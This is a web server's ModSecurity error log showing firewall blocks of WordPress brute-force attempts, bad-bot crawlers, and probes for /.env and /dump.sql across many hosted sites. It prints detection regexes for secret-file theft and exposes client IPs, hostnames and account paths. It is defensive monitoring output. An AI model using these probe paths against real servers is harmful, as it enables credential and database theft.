[Tue May 26 14:32:30.064822 2026] [security2:error] [pid 610693:tid 610784] [remote 46.101.75.237:54590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVhpTvNO3hpmlY6M8R6VwAAHlo"]
[Tue May 26 14:32:30.651781 2026] [security2:error] [pid 610693:tid 610860] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhpjvNO3hpmlY6M8R6YAAAACU"]
[Tue May 26 14:32:33.028697 2026] [security2:error] [pid 610693:tid 610875] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhqDvNO3hpmlY6M8R6sQAAADQ"]
[Tue May 26 14:32:34.284875 2026] [security2:error] [pid 610693:tid 610933] [client 146.174.176.58:42206] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVhqDvNO3hpmlY6M8R6qwAAAG4"]
[Tue May 26 14:32:34.483843 2026] [security2:error] [pid 610693:tid 610931] [client 202.141.83.254:19926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhqjvNO3hpmlY6M8R67AAAAGw"]
[Tue May 26 14:32:34.483999 2026] [security2:error] [pid 610693:tid 610931] [client 202.141.83.254:19926] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhqjvNO3hpmlY6M8R67AAAAGw"]
[Tue May 26 14:32:34.865460 2026] [security2:error] [pid 610693:tid 610926] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhqjvNO3hpmlY6M8R66wAAAGc"]
[Tue May 26 14:32:34.978651 2026] [security2:error] [pid 610693:tid 610828] [client 154.161.32.97:56480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhqjvNO3hpmlY6M8R69QAAAAU"]
[Tue May 26 14:32:34.978762 2026] [security2:error] [pid 610693:tid 610828] [client 154.161.32.97:56480] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhqjvNO3hpmlY6M8R69QAAAAU"]
[Tue May 26 14:32:36.394403 2026] [security2:error] [pid 610693:tid 610834] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhqzvNO3hpmlY6M8R7EAAAAAs"]
[Tue May 26 14:32:38.453760 2026] [security2:error] [pid 610693:tid 610696] [remote 163.223.13.54:33152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVhrjvNO3hpmlY6M8R7OwAANwI"]
[Tue May 26 14:32:39.005204 2026] [security2:error] [pid 610693:tid 610936] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhrjvNO3hpmlY6M8R7RwAAAHE"]
[Tue May 26 14:32:40.993396 2026] [security2:error] [pid 610693:tid 610833] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhsDvNO3hpmlY6M8R7cwAAAAo"]
[Tue May 26 14:32:41.610709 2026] [security2:error] [pid 610693:tid 610723] [remote 178.104.164.71:56324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVhsTvNO3hpmlY6M8R7lAAALx0"]
[Tue May 26 14:32:42.672302 2026] [security2:error] [pid 610693:tid 610912] [client 185.191.171.17:53466] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVhsjvNO3hpmlY6M8R7ugAAAFk"]
[Tue May 26 14:32:42.672441 2026] [security2:error] [pid 610693:tid 610912] [client 185.191.171.17:53466] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVhsjvNO3hpmlY6M8R7ugAAAFk"]
[Tue May 26 14:32:43.063751 2026] [security2:error] [pid 610693:tid 610922] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhsjvNO3hpmlY6M8R7uQAAAGM"]
[Tue May 26 14:32:43.697528 2026] [security2:error] [pid 610693:tid 610721] [remote 121.200.216.55:47486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVhszvNO3hpmlY6M8R7zQAANxs"]
[Tue May 26 14:32:44.769758 2026] [security2:error] [pid 610693:tid 610930] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhtDvNO3hpmlY6M8R73wAAAGs"]
[Tue May 26 14:32:44.918925 2026] [security2:error] [pid 610693:tid 610826] [client 202.141.83.254:53856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhtDvNO3hpmlY6M8R77wAAAAM"]
[Tue May 26 14:32:44.919581 2026] [security2:error] [pid 610693:tid 610826] [client 202.141.83.254:53856] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhtDvNO3hpmlY6M8R77wAAAAM"]
[Tue May 26 14:32:46.276038 2026] [autoindex:error] [pid 610693:tid 610855] [client 198.235.24.13:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:32:46.720613 2026] [security2:error] [pid 610693:tid 610917] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhtjvNO3hpmlY6M8R8NgAAAF4"]
[Tue May 26 14:32:49.240871 2026] [security2:error] [pid 610693:tid 610911] [client 176.65.139.237:23760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sandbox.dezka.mx"] [uri "/.env"] [unique_id "ahVhuTvNO3hpmlY6M8R8gQAAAFg"]
[Tue May 26 14:32:49.258702 2026] [security2:error] [pid 610693:tid 610933] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhuDvNO3hpmlY6M8R8dwAAAG4"]
[Tue May 26 14:32:49.314734 2026] [security2:error] [pid 610693:tid 610921] [client 5.255.115.58:50442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "shirdisaibabatemple.org"] [uri "/dump.sql"] [unique_id "ahVhuTvNO3hpmlY6M8R8hQAAAGI"], referer: shirdisaibabatemple.org/dump.sql
[Tue May 26 14:32:50.343760 2026] [security2:error] [pid 610693:tid 610897] [client 165.140.119.146:57873] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhujvNO3hpmlY6M8R8lgAAAEo"], referer: https://www.bloggertarget.com
[Tue May 26 14:32:50.343865 2026] [security2:error] [pid 610693:tid 610897] [client 165.140.119.146:57873] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhujvNO3hpmlY6M8R8lgAAAEo"], referer: https://www.bloggertarget.com
[Tue May 26 14:32:52.015653 2026] [security2:error] [pid 610693:tid 610875] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhuzvNO3hpmlY6M8R8uAAAADQ"]
[Tue May 26 14:32:53.356259 2026] [security2:error] [pid 610693:tid 610823] [client 114.119.130.183:21649] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "usteve.com"] [uri "/robots.txt"] [unique_id "ahVhvTvNO3hpmlY6M8R85gAAAAA"]
[Tue May 26 14:32:53.891783 2026] [security2:error] [pid 610693:tid 610944] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhvTvNO3hpmlY6M8R89QAAAHk"]
[Tue May 26 14:32:55.493859 2026] [security2:error] [pid 610693:tid 610949] [client 202.141.83.254:5785] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhvzvNO3hpmlY6M8R9GgAAAH4"]
[Tue May 26 14:32:55.494023 2026] [security2:error] [pid 610693:tid 610949] [client 202.141.83.254:5785] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhvzvNO3hpmlY6M8R9GgAAAH4"]
[Tue May 26 14:32:55.534428 2026] [core:error] [pid 610693:tid 610832] [client 74.7.244.40:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:32:55.534445 2026] [core:error] [pid 610693:tid 610832] [client 74.7.244.40:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:32:55.534566 2026] [security2:error] [pid 610693:tid 610832] [client 74.7.244.40:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "service.google.com.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVhvzvNO3hpmlY6M8R9IwAAAAk"]
[Tue May 26 14:32:55.535365 2026] [security2:error] [pid 610693:tid 610897] [client 74.7.244.40:49418] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "service.google.com.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahVhvzvNO3hpmlY6M8R9IQAASjY"]
[Tue May 26 14:32:56.277320 2026] [security2:error] [pid 610693:tid 610899] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhvzvNO3hpmlY6M8R9JgAAAEw"]
[Tue May 26 14:32:57.234169 2026] [security2:error] [pid 610693:tid 610861] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhwDvNO3hpmlY6M8R9OwAAACY"]
[Tue May 26 14:32:57.681045 2026] [security2:error] [pid 610693:tid 610885] [client 14.166.102.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhwTvNO3hpmlY6M8R9SwAAAD4"]
[Tue May 26 14:32:57.711991 2026] [autoindex:error] [pid 610693:tid 610842] [client 198.235.24.18:58872] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:32:59.862052 2026] [security2:error] [pid 610693:tid 610863] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhwzvNO3hpmlY6M8R9jQAAACg"]
[Tue May 26 14:33:00.070617 2026] [security2:error] [pid 610693:tid 610936] [client 118.173.88.96:44419] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhwzvNO3hpmlY6M8R9mQAAAHE"]
[Tue May 26 14:33:00.326718 2026] [security2:error] [pid 610693:tid 610908] [client 176.65.139.232:44550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cuatrodoce.com.mx"] [uri "/.env"] [unique_id "ahVhxDvNO3hpmlY6M8R9qAAAAFU"]
[Tue May 26 14:33:00.642048 2026] [security2:error] [pid 610693:tid 610809] [remote 74.7.241.58:42842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVhxDvNO3hpmlY6M8R9sgAACnM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 14:33:00.771490 2026] [security2:error] [pid 610693:tid 610936] [client 118.173.88.96:44419] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhwzvNO3hpmlY6M8R9mQAAAHE"]
[Tue May 26 14:33:00.771560 2026] [security2:error] [pid 610693:tid 610936] [client 118.173.88.96:44419] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhwzvNO3hpmlY6M8R9mQAAAHE"]
[Tue May 26 14:33:01.903992 2026] [security2:error] [pid 610693:tid 610950] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhxTvNO3hpmlY6M8R90AAAAH8"]
[Tue May 26 14:33:02.053411 2026] [security2:error] [pid 610693:tid 610922] [client 118.173.88.96:44489] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhxjvNO3hpmlY6M8R93gAAAGM"]
[Tue May 26 14:33:02.093826 2026] [security2:error] [pid 610693:tid 610922] [client 118.173.88.96:44489] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhxjvNO3hpmlY6M8R93gAAAGM"]
[Tue May 26 14:33:03.410342 2026] [security2:error] [pid 610693:tid 610926] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhxjvNO3hpmlY6M8R99AAAAGc"]
[Tue May 26 14:33:03.498160 2026] [security2:error] [pid 610693:tid 610884] [client 118.173.88.96:44544] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhxzvNO3hpmlY6M8R9_AAAAD0"]
[Tue May 26 14:33:03.538030 2026] [security2:error] [pid 610693:tid 610884] [client 118.173.88.96:44544] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhxzvNO3hpmlY6M8R9_AAAAD0"]
[Tue May 26 14:33:03.998440 2026] [security2:error] [pid 610693:tid 610912] [client 45.33.80.243:2194] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahVhxzvNO3hpmlY6M8R9_gAAAFk"]
[Tue May 26 14:33:04.087784 2026] [security2:error] [pid 610693:tid 610929] [client 154.161.32.97:46543] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhxzvNO3hpmlY6M8R-AwAAAGo"]
[Tue May 26 14:33:04.087930 2026] [security2:error] [pid 610693:tid 610929] [client 154.161.32.97:46543] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhxzvNO3hpmlY6M8R-AwAAAGo"]
[Tue May 26 14:33:04.930275 2026] [security2:error] [pid 610693:tid 610950] [client 118.173.88.96:44577] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhyDvNO3hpmlY6M8R-FQAAAH8"]
[Tue May 26 14:33:04.973431 2026] [security2:error] [pid 610693:tid 610950] [client 118.173.88.96:44577] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhyDvNO3hpmlY6M8R-FQAAAH8"]
[Tue May 26 14:33:05.836742 2026] [security2:error] [pid 610693:tid 610887] [client 202.141.83.254:19962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhyTvNO3hpmlY6M8R-LQAAAEA"]
[Tue May 26 14:33:05.837234 2026] [security2:error] [pid 610693:tid 610887] [client 202.141.83.254:19962] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhyTvNO3hpmlY6M8R-LQAAAEA"]
[Tue May 26 14:33:06.031938 2026] [security2:error] [pid 610693:tid 610927] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhyTvNO3hpmlY6M8R-IgAAAGg"]
[Tue May 26 14:33:06.396610 2026] [security2:error] [pid 610693:tid 610894] [client 118.173.88.96:44597] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhyjvNO3hpmlY6M8R-PQAAAEc"]
[Tue May 26 14:33:06.438980 2026] [security2:error] [pid 610693:tid 610894] [client 118.173.88.96:44597] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhyjvNO3hpmlY6M8R-PQAAAEc"]
